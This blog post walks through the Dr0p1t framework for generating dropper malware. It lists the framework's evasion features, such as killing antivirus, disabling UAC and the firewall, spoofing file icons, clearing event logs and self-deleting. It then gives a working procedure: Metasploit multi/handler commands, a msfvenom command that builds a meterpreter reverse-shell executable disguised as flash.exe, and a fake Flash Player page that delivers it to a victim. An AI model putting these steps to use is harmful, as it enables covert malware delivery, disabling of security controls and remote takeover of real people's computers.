Dr0p1t Framework for generating Dropper Malware | Lucideus Research

Introduction

Dr0p1t is a framework for generating Dropper Malware.
Dropper : A dropper is a type of malware that’s sole purpose is to download and execute other malware.
Dr0p1t Framework uses several techniques to deliver the payload such as -
  • We can use Dr0p1t Server to use a fake but authentic looking Flash webpage
  • We can use application specific icons
  • The executable size is smaller compared to other droppers generated the same way.
  • Download executable on target system and execute it silently..
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
  • Clear event log after finishing.


Available Modules
  • Find and kill antivirus before running the malware.
  • The ability to disable UAC.
  • The ability to run your malware as admin.
  • Full spoof by spoofing the file icon and extension to any thing you want.
  • ZIP files support so now you can compress your executable to zip file before uploading.
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
PoC
  • After Git-clone and installation...
    cd Dr0p1t-Framework
    python Dr0p1t_server.py


  • Start Metasploit-Framework and setup multi/handler
    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST IP
    set LPORT Port
    exploit

  • Generate a payload using msfvenom
    msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=PORT -f exe > /var/www/html/flash.exe
    I am using path /var/www/html because our payload will be hosted in Apache Server and this is the default path for apache server.
  • Dr0p1t Server can be accessed on localhost:5000
    This is the default address for Dr0p1t Server
    Let’s explore…

  • This is Drr0p1t Server
    Now lets customize our payload…
    Enter Malware URL : http://IP/flash.exe
    Enable - Disable UAC module
    Enable - Run as Admin module
    Enter Batchfile Script name - disable_firewall.bat
    This bat file comes with Dr0p1t Framework
    Enter Icon name - flash.ico
    This icon file also comes with the package
    Click on Submit
    Now we have customized our payload and we get a download link…
  • Lets see what happens when we open this link on our target machine…

  • This webpage loads when we open the above generated link and it looks exactly like an authentic flash player webpage
  • We can see that UAC and Firewall are enabled, now lets download our payload…

    So, the file we downloaded looks original as we have the same name and icon as that of an original flash player EXE
  • Now let’s execute it.

    On execution we can see that UAC and Firewall both are automatically disabled and clean up is performed in the download directory, after few seconds the malicious flash.exe is automatically removed from the folder and we have successfully installed a backdoor along with cleanup...and on the attacker side.

  • We get a meterpreter session.

Post a Comment

0 Comments